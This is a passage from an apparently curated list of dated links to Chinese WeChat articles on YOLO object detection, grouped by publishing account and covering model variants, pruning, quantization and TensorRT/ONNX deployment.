Xaiver่ถ…ๅฎžๆ—ถ๏ผŒ็ฒพๅบฆๅ’Œ้€ŸๅบฆๅฎŒ็พŽ่ถ…่ถŠYOLOXใ€v4ใ€v5ใ€v6](https://mp.weixin.qq.com/s/BK3IRiJdKfPE53KFpvjTCg) - [2023-02-22๏ผŒYOLOv5ๆŠ›ๅผƒAnchor-Baseๆ–นๆณ• | YOLOv5uๆญฃๅผๅŠ ๅ…ฅAnchor-Freeๅคงๅฎถๅบญ](https://mp.weixin.qq.com/s/m09WRKRqC1bngCOzip_hFA) - [2023-03-08๏ผŒๅ…จๆ–ฐๅ‰ชๆžๆก†ๆžถ | YOLOv5ๆจกๅž‹็ผฉๅ‡4ๅ€๏ผŒๆŽจ็†้€Ÿๅบฆๆๅ‡2ๅ€](https://mp.weixin.qq.com/s/p_c0w43ns7rFOzamtOSPVg) - [2023-03-31 ๏ผŒๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ | ๅณๆ’ๅณ็”จ | YOLOv5ๅฏไปฅ่ฟ™ๆ ทๅ‡็บง](https://mp.weixin.qq.com/s/vgg_m80A06xFWQGgw2WhHg) - [2023-03-14๏ผŒๅฎž่ทตๆ•™็จ‹๏ฝœTensorRTไธญๅฏนONNXๆจกๅž‹่งฃๆž่ฟ‡็จ‹](https://mp.weixin.qq.com/s/L-TpXpBJI7y0wKmBr9arjQ) - [2023-03-24๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹Trick | SEAๆ–นๆณ•่ฝปๆพๆŠนๅนณOne-StageไธŽTwo-Stage็›ฎๆ ‡ๆฃ€ๆต‹ไน‹้—ด็š„ๅทฎ่ท](https://mp.weixin.qq.com/s/spEL2hYmYykkQkc4aNxJAg) - [2023-03-30๏ผŒๅณๆ’ๅณ็”จ | CEASAๆจกๅ—็ป™ไฝ ๆ‰€ๆœ‰๏ผŒๅฐ็›ฎๆ ‡็ฒพๅบฆๆๅ‡็š„ๅŒๆ—ถ้€ŸๅบฆไนŸๅ˜ๅฟซไบ†](https://mp.weixin.qq.com/s/-a4Wz04jLHFiAU88pUyDNQ) - [2023-04-05๏ผŒ้ƒจ็ฝฒๆŠ€ๅทงไน‹PAGCPๅ‰ชๆž | Yolov5/ResNetๅ‚ๆ•ฐ้™ไฝŽ50%้€Ÿๅบฆ็ฟปๅ€็ฒพๅบฆไธๅ‡](https://mp.weixin.qq.com/s/3_2Dcm8VpoGFksFZE6n2kQ) - [2023-04-12๏ผŒFaster RCNN่ถ…ๅฟซ็‰ˆๆœฌๆฅๅ•ฆ | TinyDet็”จๅฐไบŽ1GFLOPSๅฎž็Žฐ30+AP๏ผŒๅฐ็›ฎๆ ‡็‚ธ่ฃ‚](https://mp.weixin.qq.com/s/-AtF3B_A0rzvS8cUcZQ6Hw) - [2023-04-13๏ผŒๅณๆ’ๅณ็”จๆจกๅ— | RFAConvๅŠฉๅŠ›YOLOv8ๅ†ๆถจ2ไธช็‚น](https://mp.weixin.qq.com/s/lsOQiq9wXHxagE_uQ_yOiw) - [2023-04-19๏ผŒYOLO่ถ…ๅฟซๆ—ถไปฃ็ปˆ็ป“ไบ† | RT-DETR็”จ114FPSๅฎž็Žฐ54.8AP๏ผŒ่ฟœ่ถ…YOLOv8](https://mp.weixin.qq.com/s/V3MUXinJhpq8J4UWTUL17w) - [2023-04-21๏ผŒๅŸบไบŽYOLOv5ๆ”น่ฟ›ๅ†่ฎพ่ฎก | M2Sๅ…จ้ขๆๅ‡ๅฐ็›ฎๆ ‡็ฒพๅบฆ](https://mp.weixin.qq.com/s/FlKgYYGUHtJAxCF2wrh4NA) - [2023-06-06๏ผŒไธ€ๆ–‡ๅ…จ่งˆ | 2023ๆœ€ๆ–ฐ็Žฏ่ง†่‡ชๅŠจ้ฉพ้ฉถ3Dๆฃ€ๆต‹็ปผ่ฟฐ๏ผ](https://mp.weixin.qq.com/s/4eE5kWGF5FekHHCZOg9rNA) - [2023-06-21๏ผŒAIๆจกๅž‹้ƒจ็ฝฒๅฎžๆˆ˜ | ๅˆฉ็”จCV-CUDAๅŠ ้€Ÿ่ง†่ง‰ๆจกๅž‹้ƒจ็ฝฒๆต็จ‹](https://mp.weixin.qq.com/s/kdxz3zn77031MDNxVm_k0Q) - [2023-07-20๏ผŒQ-YOLOPๆฅๅ•ฆ | ไธ€ไธชๅ…ทๆœ‰้‡ๅŒ–ๆ„Ÿ็Ÿฅๅ…จๆ™ฏ้ฉพ้ฉถๆ„Ÿ็Ÿฅๆจกๅž‹](https://mp.weixin.qq.com/s/kaAoqp-8af0bUA7byYKKPA) - [2023-07-29๏ผŒTensorRT้ƒจ็ฝฒ็ณปๅˆ— | ๅฆ‚ไฝ•ๅฐ†ๆจกๅž‹ไปŽ PyTorch ่ฝฌๆขไธบ TensorRT ๅนถๅŠ ้€ŸๆŽจ็†๏ผŸ](https://mp.weixin.qq.com/s/F0ZV9yTW8_UHJrvNew8qOA) - [2023-08-03๏ผŒYOLO่ฝๅœฐ้ƒจ็ฝฒ | ไธ€ๆ–‡ๅ…จ่งˆYOLOv5ๆœ€ๆ–ฐ็š„ๅ‰ชๆžใ€้‡ๅŒ–็š„่ฟ›ๅฑ•ใ€ๅฟ…่ฏปใ€‘](https://mp.weixin.qq.com/s/AzwdSKNs8SnIIRsdG0cZAg) - [2023-08-11๏ผŒYOLODไนŸๆฅๅ•ฆ | ไผ˜ๅŒ–YOLOv5ๆ ทๆœฌๅŒน้…๏ผŒ้กบๅธฆ่ฎพ่ฎกไบ†ๅ…จๆ–ฐ็š„ๆจกๅ—](https://mp.weixin.qq.com/s/erkyca0OtJoyXAXI_I6RmQ) - [2023-09-05๏ผŒYOLO ไธŽ BEV ไปฅๅŠ3D็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•็ฉถ็ซŸๅบ”่ฏฅๆ€Žไนˆๆ‰ๅฏไปฅๆ›ดๅฅฝ็š„่ฝๅœฐ๏ผŸ](https://mp.weixin.qq.com/s/B1iFf936wAORB53QboTXjg) - [2024-02-01๏ผŒๅคชๅผบ๏ผAIๆฒกๆœ‰่ฝไธ‹็š„่…พ่ฎฏๅ‡บYOLO-World็ˆ†ๆฌพ | ๅผ€้›†็›ฎๆ ‡ๆฃ€ๆต‹้€Ÿๅบฆๆๅ‡20ๅ€๏ผŒๆ•ˆๆžœไธๅ‡](https://mp.weixin.qq.com/s/Fj6wzARTo1l7UEwKxDAh6w) - [2024-02-14๏ผŒYOLOPointๅผ€ๆบ | ๆ–ฐๅนดYOLOไพ็„ถๅšๆŒบ๏ผŒ้€š่ฟ‡็ป“ๅˆYOLOv5&SuperPoint๏ผŒๆˆๅฐฑๅคšไปปๅŠกSOTA](https://mp.weixin.qq.com/s/8Lkl3aMwjESRyeZfLMu7Tw) - [2024-02-23๏ผŒFocaler-IoUๅผ€ๆบ | ้ซ˜ไบŽSIoU+ๅ…ณๆณจๅ›ฐ้šพๆ ทๆœฌ๏ผŒ่ฎฉYOLOv5ๅ†ๆถจ1.9%๏ผŒYOLOv8ๅ†ๆถจ็‚น0.3%](https://mp.weixin.qq.com/s/A_BABGHKp5Icdmlk3q3lIA) - [2024-02-23๏ผŒYOLOv9ๅผ€ๆบ | ๆžถๆž„ๅ›พ&ๆจกๅ—ๆ”น่ฟ›&ๆญฃ่ดŸๆ ทๆœฌๅŒน้…&ๆŸๅคฑๅ‡ฝๆ•ฐ่งฃ่ฏป๏ผŒ5ๅˆ†้’Ÿๅณๅฏ็†่งฃYOLOv9](https://mp.weixin.qq.com/s/31NlBknx4PcXipfuV2w6hw) - [2024-04-15๏ผŒYOLC ๆฅ่ขญ | ้ฅ้ฅ้ข†ๅ…ˆ ๏ผYOLOไธŽCenterNetๆ€ๆƒณ็ซ่Šฑ็ขฐๆ’ž๏ผŒ่ฎฉๅฐ็›ฎๆ ‡็š„ๆฃ€ๆต‹ๆ€ง่ƒฝๅŽŸๅœฐ่ตท้ฃž๏ผŒ่ฝๅœฐไปทๅ€ผๆžๅคง !](https://mp.weixin.qq.com/s/6UzdFFKeNOCLK8YdhPYCaQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰็ ”็ฉถ้™ขใ€ - [2022-10-30๏ผŒYoloV๏ผš่ง†้ข‘ไธญ็›ฎๆ ‡ๅฎžๆ—ถๆฃ€ๆต‹ไพ็„ถๅพˆๆฃ’๏ผˆ้™„ๆบไปฃ็ ไธ‹่ฝฝ๏ผ‰](https://mp.weixin.qq.com/s/Ytr1m2EOJMWF6WmHDmai2A) - [2022-11-04๏ผŒๆ”น่ฟ›็š„YOLO๏ผšAF-FPNๆ›ฟๆข้‡‘ๅญ—ๅก”ๆจกๅ—ๆๅ‡็›ฎๆ ‡ๆฃ€ๆต‹็ฒพๅบฆ](https://mp.weixin.qq.com/s/JVr1C9nPTYlHS4aei-Zqrg) - [2022-12-31๏ผŒMicro-YOLO๏ผšๆŽข็ดข็›ฎๆ ‡ๆฃ€ๆต‹ๅŽ‹็ผฉๆจกๅž‹็š„ๆœ‰ๆ•ˆๆ–นๆณ•๏ผˆ้™„่ฎบๆ–‡ไธ‹่ฝฝ๏ผ‰](https://mp.weixin.qq.com/s/0_sF3U232i0PEw1NHE2Efw) - [2023-02-25๏ผŒไฝฟ็”จONNXRuntime้ƒจ็ฝฒ้˜ฟ้‡Œ่พพๆ‘ฉ้™ขๅผ€ๆบDAMO-YOLO็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒไธ€ๅ…ฑๅŒ…ๅซ27ไธชonnxๆจกๅž‹(ไปฃ็ ๅผ€ๆบ)](https://mp.weixin.qq.com/s/cQo7HMcWcbZgk7XIzj1q2A) - [2023-04-03๏ผŒCVPR 2023 ่ฎบๆ–‡ๅˆ†็ฑปๆฑ‡ๆ€ป๏ผšไธ€ไธชไธ“ไธบ่ฎก็ฎ—ๆœบ่ง†่ง‰้ข†ๅŸŸ็ ”็ฉถ่€…ๆ‰“้€ ็š„ๅญฆๆœฏ่ต„ๆบๅฎๅบ“](https://mp.weixin.qq.com/s/g8yUdF0SP-81VpVfFjTqNw) - [2023-04-07๏ผŒMicro-YOLO๏ผšๆŽข็ดข็›ฎๆ ‡ๆฃ€ๆต‹ๅŽ‹็ผฉๆจกๅž‹็š„ๆœ‰ๆ•ˆๆ–นๆณ•๏ผˆ้™„่ฎบๆ–‡ไธ‹่ฝฝ๏ผ‰](https://mp.weixin.qq.com/s/xMq10ZZQnFyXaob0H-Z1qw) - [2023-04-07๏ผŒๅฎž็”จๆ•™็จ‹่ฏฆ่งฃ๏ผšๆจกๅž‹้ƒจ็ฝฒ๏ผŒ็”จDNNๆจกๅ—้ƒจ็ฝฒYOLO็›ฎๆ ‡ๆฃ€ๆต‹๏ผˆ้™„ๆบไปฃ็ ๏ผ‰](https://mp.weixin.qq.com/s/ny98FTagPQB1-GnHKFu2MA) - [2023-04-20๏ผŒๅ…จ่‡ชๅŠจๅฎžๆ—ถ็งปๅŠจ็ซฏAIๆก†ๆžถ | YOLO-v4็›ฎๆ ‡ๆฃ€ๆต‹ๅฎžๆ—ถๆ‰‹ๆœบ็ซฏๅฎž็Žฐ](https://mp.weixin.qq.com/s/FPG44PhAxNi7cy_ALcNXmA) - [2023-04-22๏ผŒCVPR็›ฎๆ ‡ๆฃ€ๆต‹ๆ–ฐๆก†ๆžถ๏ผšไธๅ†ๆ˜ฏYOLO๏ผŒ่€Œๆ˜ฏๅช้œ€่ฆไธ€ๅฑ‚็‰นๅพ๏ผˆๅนฒ่ดงๆปกๆปก๏ผŒๅปบ่ฎฎๆ”ถ่—๏ผ‰](https://mp.weixin.qq.com/s/5sTxdjhKIPpQ-rCsWfe80A) - [2023-04-25๏ผŒGPT-CV๏ผšๅŸบไบŽYolov5็š„ๅŠ็›‘็ฃ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/wK-5i30X06SfLgASlRdqJw) - [2023-04-25๏ผŒEdgeYOLO๏ผš่พน็ผ˜่ฎพๅค‡ไธŠๅฎžๆ—ถ่ฟ่กŒ็š„็›ฎๆ ‡ๆฃ€ๆต‹ๅ™จๅŠPytorchๅฎž็Žฐ](https://mp.weixin.qq.com/s/zEFjvUKnrm5Iwa6e9Fy29Q) - [2023-04-26๏ผŒๆ”น่ฟ›็š„YOLO๏ผšAF-FPNๆ›ฟๆข้‡‘ๅญ—ๅก”ๆจกๅ—ๆๅ‡็›ฎๆ ‡ๆฃ€ๆต‹็ฒพๅบฆ](https://mp.weixin.qq.com/s/xocZNuIOCgGynjZxX_xKgw) - [2023-06-22๏ผŒRestoreDet๏ผšไฝŽๅˆ†่พจ็Ž‡ๅ›พๅƒไธญ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/FqBq9gy-NKfp3W2qgKHb5w) - [2023-07-12๏ผŒGPT็†่งฃ็š„CV๏ผšๅŸบไบŽYolov5็š„ๅŠ็›‘็ฃ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/N4x0_Bu078g1zSMIDPwzZg) - [2023-07-12๏ผŒYoloV8ไธŽChatGPTไบ’้€š๏ผŒ่ฟ™ๅŠŸ่ƒฝๆ˜ฏ็œŸ็š„ๅผบๅคง๏ผ](https://mp.weixin.qq.com/s/ODIFRyvfbZOiEORLdWGc_A) - [2023-07-24๏ผŒYOLO-S้ข„ๅ‘Š๏ผšไธ€็ง็”จไบŽๅฐ็›ฎๆ ‡ๆฃ€ๆต‹็š„่ฝป้‡็บงใ€็ฒพ็กฎ็š„็ฑปYOLO็ฝ‘็ปœ](https://mp.weixin.qq.com/s/-G2TpQOOhLyYDw5wPODBkw) - [2023-08-20๏ผŒYoloๆก†ๆžถไผ˜ๅŒ–๏ผš้ป‘ๅคœไธญไนŸๅฏไปฅๅฎžๆ—ถ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/e0EJVHKW7nkfkMVurMgR2Q) - [2023-09-04๏ผŒCRAS-YOLO๏ผšๅคš็ฑปๅˆซ่ˆน่ˆถๆฃ€ๆต‹ไธŽๅˆ†็ฑปๆจกๅž‹](https://mp.weixin.qq.com/s/ztdYjDbWzpx2LnWTiVWdrQ) - [2023-09-04๏ผŒDrone-YOLO๏ผšไธ€็งๆœ‰ๆ•ˆ็š„ๆ— ไบบๆœบๅ›พๅƒ็›ฎๆ ‡ๆฃ€ๆต‹](https://mp.weixin.qq.com/s/X4HGQhWaxy1bQssrQIYBmQ) - [2023-09-05๏ผŒBFD-YOLO๏ผšๅŸบไบŽYOLOv7็š„ๅปบ็ญ‘ๅค–ๅข™็ผบ้™ทๆฃ€ๆต‹](https://mp.weixin.qq.com/s/BaqXo4uTeqoY5FhD2jVuxA) - [2024-05-26๏ผŒYolov10๏ผš่ฏฆ่งฃใ€้ƒจ็ฝฒใ€ๅบ”็”จไธ€็ซ™ๅผ้ฝๅ…จ๏ผ](https://mp.weixin.qq.com/s/damt3VWade0we1MSCe9_QA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œๆ–ฐๆœบๅ™จ่ง†่ง‰ใ€ - [โ€‹2023-03-22๏ผŒYOLO็ณปๅˆ—็š„ๆผ”่ฟ›๏ผŒไปŽv1ๅˆฐv7](https://mp.weixin.qq.com/s/0ALtok0vleMif-5_rgCycQ) - [2023-03-23๏ผŒโ€‹YOLO็ณปๅˆ—็š„ๆผ”่ฟ›๏ผŒไปŽv1ๅˆฐv7๏ผˆไบŒ๏ผ‰](https://mp.weixin.qq.com/s/_aVWQ-NxGwZthA_D_drTRw) - [2023-03-24๏ผŒYOLO็ณปๅˆ—็š„ๆผ”่ฟ›๏ผŒไปŽv1ๅˆฐv7๏ผˆไธ‰๏ผ‰](https://mp.weixin.qq.com/s/Ngz7SYEtQ8jsejKG0IknXg) - [2023-05-20๏ผŒๆœบๅ™จ่ง†่ง‰ๅ’Œๆจกๅผ่ฏ†ๅˆซๅบ“ๆฑ‡ๆ€ป](https://mp.weixin.qq.com/s/UaqBSCWnGbLLCuy8cvJpkQ) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒOpenMMLabใ€ - [2022-10-20๏ผŒ็คพๅŒบๅไฝœ๏ผŒ็ฎ€ๆดๆ˜“็”จ๏ผŒๅฟซๆฅๅผ€็ฎฑๆ–ฐไธ€ไปฃ YOLO ็ณปๅˆ—ๅผ€ๆบๅบ“](https://mp.weixin.qq.com/s/ZK1hzp6QJarS1xiqkBWcrg) - [2023-03-28๏ผŒๅปบ่ฎฎๆ”ถ่—๏ผ่ถ…ๅฎž็”จ็š„ YOLO ่ฎญ็ปƒ&ๆต‹่ฏ•ๆŠ€ๅทงๅˆ้›†](https://mp.weixin.qq.com/s/iF2Upd2ThMBlWPim8Gj13g) - [โ€‹2023-01-12๏ผŒYOLOv8 ๆทฑๅบฆ่ฏฆ่งฃ๏ผไธ€ๆ–‡็œ‹ๆ‡‚๏ผŒๅฟซ้€ŸไธŠๆ‰‹](https://mp.weixin.qq.com/s/_RNmB3KtYEt7UuDsCOJ3rQ) - [2023-04-04๏ผŒๆ˜พ่‘—ๆๅ‡ๆจกๅž‹็ฒพๅบฆ๏ผไปฅ MMYOLO ไธบไพ‹ ๏ผŒๅทง็”จ MMRazor ่ฝป้‡็บง้ชจๅนฒ็ฝ‘็ปœ](https://mp.weixin.qq.com/s/ilCMYZmG_XpvJ_ysB1cgkw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่‡ชๅŠจ้ฉพ้ฉถไน‹ๅฟƒใ€ - [2022-10-26๏ผŒๆ‰‹ๆŠŠๆ‰‹ๆ•™ๅญฆ๏ผTensorRT้ƒจ็ฝฒๅฎžๆˆ˜๏ผšYOLOv5็š„ONNXๆจกๅž‹้ƒจ็ฝฒ](https://mp.weixin.qq.com/s/M47rwwbU0FRrgd-Xg9c7ww) - [2022-11-12๏ผŒSSDA-YOLO๏ผš็”จไบŽ่ทจๅŸŸ็›ฎๆ ‡ๆฃ€ๆต‹็š„ๅŠ็›‘็ฃๅŸŸ่‡ช้€‚ๅบ”YOLOๆ–นๆณ•](https://mp.weixin.qq.com/s/FFRsxSaTeGvs1ssKGCD6lg) - [2022-11-30๏ผŒ่พพๆ‘ฉ้™ข | DAMO-YOLO๏ผšๅ…ผ้กพ้€ŸๅบฆไธŽ็ฒพๅบฆ็š„ๆ–ฐ็›ฎๆ ‡ๆฃ€ๆต‹ๆก†ๆžถ](https://mp.weixin.qq.com/s/QYsCzgMhW9Mfsa6CYolVuQ) - [2022-12-23๏ผŒ้€š็”จๅฐ็›ฎๆ ‡Trick | ๆทฑๅบฆๅญฆไน ๆฃ€ๆต‹ๅฐ็›ฎๆ ‡ๅธธ็”จๆ–นๆณ•็›˜็‚น](https://mp.weixin.qq.com/s/WRVjub3ePxWoCBQXKhS__w) - [2023-01-12๏ผŒ็บฏ้‡ไบง็ป้ชŒ | ่ฐˆ่ฐˆ็›ฎๆ ‡ๆฃ€ๆต‹ไธญๆญฃ่ดŸๆ ทๆœฌ็š„้—ฎ้ข˜](https://mp.weixin.qq.com/s/esGe2o3_pPXUlrysZoCQKQ) - [2023-05-15๏ผŒๆœ€ๆ–ฐ๏ผ่‡ชๅŠจ้ฉพ้ฉถไธญ็”จไบŽ็›ฎๆ ‡ๆฃ€ๆต‹ๅ’Œ่ฏญไน‰ๅˆ†ๅ‰ฒ็š„Radar-Camera่žๅˆ็ปผ่ฟฐ](https://mp.weixin.qq.com/s/EHTXisVDv7SV4UEbo7sdbQ) - [2023-05-19๏ผŒ25FPS๏ผ่‹ฑไผŸ่พพ้ฆ–ๅ‘BEVFusion้ƒจ็ฝฒๆบไปฃ็ ๏ผŒ่พน็ผ˜็ซฏๅฎžๆ—ถ่ฟ่กŒ๏ผ๏ผ๏ผ](https://mp.weixin.qq.com/s/79DskdwwSghyldvQF43l6A) - [2023-05-21๏ผŒไฟๅง†็บงๅผ€ๆบๆ•™็จ‹ | ๆ‰‹ๆŠŠๆ‰‹ๆ•™ไฝ ้ƒจ็ฝฒFreeYOLO](https://mp.weixin.qq.com/s/AhPaSVl2Gh8zWtJ74IUyzw) - [2023-05-29๏ผŒๆœ€ๆ–ฐSOTA๏ผBEVFusion4D๏ผšBEVFusionๅ‡็บง็‰ˆ3Dๆฃ€ๆต‹ๆ—ถ็ฉบๆ–ฐๆก†ๆžถ๏ผ](https://mp.weixin.qq.com/s/i3lLadD3_Q5RX5D0JUocPQ) - [2023-06-04๏ผŒไธ‡ๅญ—้•ฟๆ–‡ | TransformerๅœจBEVใ€2D/3Dๆฃ€ๆต‹ไธŠ็š„ๅบ”็”จใ€้‡ๅŒ–ไธŽๅŠ ้€Ÿ๏ผ](https://mp.weixin.qq.com/s/sEWfs2C62cuThZBXSM0fZA) - [2023-06-15๏ผŒๅ…จๆžๅฎš๏ผๅŸบไบŽTensorRT็š„CNN/Transformer/ๆฃ€ๆต‹/BEVๆจกๅž‹ๅ››ๅคง้ƒจ็ฝฒไปฃ็ +CUDAๅŠ ้€Ÿ๏ผ](https://mp.weixin.qq.com/s/WjBvj6hCWEYs7IL9DlrK2Q) - [2023-08-23๏ผŒๆจกๅž‹้ƒจ็ฝฒ๏ผŒไปŠๅนด็š„้ฆ™้ฅฝ้ฅฝ๏ผTensorRT่ฏฆ็ป†ๅ…ฅ้—จๆŒ‡ๅŒ—](https://mp.weixin.qq.com/s/KsPb80tf_zxPyP0xu8ZmHA) - [2024-01-10๏ผŒYOLO่ฟ›ๅ†›BEVๆ„Ÿ็Ÿฅ๏ผYOLO+BEVๅœจๅฎžๆ—ถๆฃ€ๆต‹ไธŠ็š„ๅฐ่ฏ•](https://mp.weixin.qq.com/s/8pceyAzzGvwKNnRE9OJEOA) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒCVHubใ€ - [2023-01-07๏ผŒ็Žฐไปฃ็›ฎๆ ‡ๆฃ€ๆต‹ๆ•…ไบ‹ | 40+็ง็ฝ‘็ปœๆžถๆž„ๅคง็›˜็‚น๏ผไปŽๅŸบ็ก€ๆžถๆž„ResNetๅˆฐๆœ€ๅผบๆฃ€ๆต‹ๅ™จYolov7ๅ†ๅˆฐๆœ€ๆ–ฐ้ƒจ็ฝฒ็ฅžๅ™จGhostNetV2](https://mp.weixin.qq.com/s/22rRzyZj93-Y4msYwa_LKQ) - [2023-02-19๏ผŒ้˜ฟ้‡Œๅ›ข้˜Ÿๆ–ฐไฝœ | ๆŽข่ฎจ YOLOv5 ็š„้ซ˜ๆ•ˆ่ฟ›้˜ถไน‹่ทฏ๏ผ](https://mp.weixin.qq.com/s/B0yHtFMTO5gwt0B-ra18QA) - [2023-05-05๏ผŒ่ถ…ๅผบ็›ฎๆ ‡ๆฃ€ๆต‹ๅ™จ RT-DETR | Python/C++ ไฟๅง†็บง้ƒจ็ฝฒๆ•™็จ‹๏ผŒไปŽๅ…ฅ้—จๅˆฐ็ฒพ้€š](https://mp.weixin.qq.com/s/W56LHZbZEqqoCPFVf612FA) - [2023-06-04๏ผŒไธญ็ง‘้™ขไธ€ๅŒบ้กถๅˆŠ TCSVT 2023 | DIAL-Filters: ๆ˜พ่‘—ๆๅ‡ๆจก็ณŠๅคœ่ง†ๅœบๆ™ฏไธ‹็š„ๆฃ€ๆต‹ๅ’Œๅˆ†ๅ‰ฒๆ€ง่ƒฝ๏ผ](https://mp.weixin.qq.com/s/qPbxjDuPOFSD2zsWAGmLQw) - [2023-07-12๏ผŒๅŒ—่ˆชๆ–ฐไฝœ | Q-YOLO: ๅŸบไบŽ TensorRT ๅ’Œ OpenVIVO ็š„็›ฎๆ ‡ๆฃ€ๆต‹้‡ๅŒ–ๅฎžๆˆ˜ๆ–นๆกˆ](https://mp.weixin.qq.com/s/Us7IiYXFtUoQJ6btpcG1lw) - [2023-07-30๏ผŒๅคง่ฟž็†ๅทฅ่”ๅˆ้˜ฟ้‡Œ่พพๆ‘ฉ้™ขๅ‘ๅธƒHQTrack | ้ซ˜็ฒพๅบฆ่ง†้ข‘ๅคš็›ฎๆ ‡่ทŸ่ธชๅคงๆจกๅž‹](https://mp.weixin.qq.com/s/Jl2mr7tszulZX19Fx4ZNgw) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œไบบๅทฅๆ™บ่ƒฝๆ„Ÿ็Ÿฅไฟกๆฏๅค„็†็ฎ—ๆณ•็ ”็ฉถ้™ขใ€ - [2023-06-15๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ไน‹VisDrone2019ๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/GJza38BBYTl6XAWiiEzpHA) - [2023-06-16๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ไน‹ๆ•ฐๆฎ้ข„ๅค„็†ไน‹ไธ€](https://mp.weixin.qq.com/s/BXueTqerYFtGg9MOhJ7YYA) - [2023-06-17๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ไน‹ๆ•ฐๆฎ้ข„ๅค„็†ไน‹ไบŒ](https://mp.weixin.qq.com/s/NblhcYo-JWZuJkMS5015sw) - [2023-06-22๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ๆถˆ่žๅฎž้ชŒไน‹ไธ€](https://mp.weixin.qq.com/s/3_03EmF0wo4hmbes5o37NQ) - [2023-06-23๏ผŒๆ”น่ฟ›YOLOV5ๅฐ็›ฎๆ ‡ๆฃ€ๆต‹ๆถˆ่žๅฎž้ชŒไน‹ไบŒ](https://mp.weixin.qq.com/s/iEEGkLFICJT03kXWQwR_sA) - [2023-07-04๏ผŒๅŸบไบŽๆ”น่ฟ›YOLOv5ๅ’Œๅฏๅ˜ๅฝขๅท็งฏ็š„ๆฐดไธ‹็พคไฝ“็›ฎๆ ‡ๆฃ€ๆต‹ๆฆ‚่ฟฐไน‹ไธ€](https://mp.weixin.qq.com/s/ZIH6Y1d6yeUV-zE6AnEvuQ) - [2023-07-05๏ผŒๅŸบไบŽๆ”น่ฟ›YOLOv5ๅ’Œๅฏๅ˜ๅฝขๅท็งฏ็š„ๆฐดไธ‹็พคไฝ“็›ฎๆ ‡ๆฃ€ๆต‹ๆฆ‚่ฟฐไน‹ไบŒ](https://mp.weixin.qq.com/s/ptkTsyG2_mOFb6lGUCSkVA) - [2023-07-07๏ผŒYOLOV5็ฎ—ๆณ•ๆ”น่ฟ›ไน‹่‡ช้€‚ๅบ”้˜ˆๅ€ผๆจกๅ—](https://mp.weixin.qq.com/s/XSBtVbtcQTrMf13E_HEeWw) - [2023-07-10๏ผŒๆ”น่ฟ›YOLOV5็ฎ—ๆณ•ไน‹ไธๅŒๆ•ฐๆฎ้›†ๆต‹่ฏ•](https://mp.weixin.qq.com/s/-0ZsO9D4o4UXuIy_a2gt0w) - [2023-07-11๏ผŒๆ”น่ฟ›YOLOV5็ฎ—ๆณ•ไธŽๅŒ็ฑป็ฎ—ๆณ•็š„ๆฏ”่พƒ](https://mp.weixin.qq.com/s/KIxhlNBuTnCLnqzKqD_GPA) - [2023-07-12๏ผŒๆ”น่ฟ›YOLOV5่‡ช้€‚ๅบ”้˜ˆๅ€ผๆจกๅ—ๅฎž้ชŒๅˆ†ๆž ](https://mp.weixin.qq.com/s/WffWRa6MzaRN4oMF3BvOWg) - [2023-07-15๏ผŒKAYOLO็ฝ‘็ปœๆจกๅž‹](https://mp.weixin.qq.com/s/rYrdJPHYE57Kc8QzVDxUfg) - [2023-07-19๏ผŒYolov8n-IOUๆŸๅคฑๅ‡ฝๆ•ฐ็š„ๆ”น่ฟ›](https://mp.weixin.qq.com/s/x1WRIC9MNQWMTup9XHkwWg) - [2023-07-26๏ผŒYOLOV7็ฎ—ๆณ•ๅŽŸ็†](https://mp.weixin.qq.com/s/KnLwHIWqespSxO0v82cJ3A) - [2023-07-30๏ผŒFlask ้ƒจ็ฝฒ YOLOV5](https://mp.weixin.qq.com/s/9dwrXEAi5tht4-tNyZ4tYw) - [2023-08-13๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•็š„ๅบ”็”จ](https://mp.weixin.qq.com/s/cX1WlVJqDNePZW18Jlf_Kg) - ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒOneFlowใ€ - [2022-12-13๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ ๏ผš็ฝ‘็ปœ็ป“ๆž„้€่กŒไปฃ็ ่งฃ่ฏป](https://mp.weixin.qq.com/s/qfZIKgBdHNwPDp5ng0Y_Qw) - [2022-12-22๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ก๏ผšๅฆ‚ไฝ•ๅˆถไฝœ่ฎญ็ปƒๆ•ˆๆžœๆ›ดๅฅฝ็š„ๆ•ฐๆฎ้›†](https://mp.weixin.qq.com/s/t4Ppf2qokpClRwCN52zF-g) - [2023-02-02๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ข๏ผšๆ›ดๅฟซๆ›ดๅฅฝ็š„่พน็•Œๆก†ๅ›žๅฝ’ๆŸๅคฑ](https://mp.weixin.qq.com/s/LIOnJqJj_GrpakKbLeWEDQ) - [2023-02-17๏ผŒYOLOv5ๅ…จ้ข่งฃๆžๆ•™็จ‹โ‘ฃ๏ผš็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹็ฒพ็กฎๅบฆ่ฏ„ไผฐ](https://mp.weixin.qq.com/s/nvfAU6TwTDoZhF8zFpCaOw) - 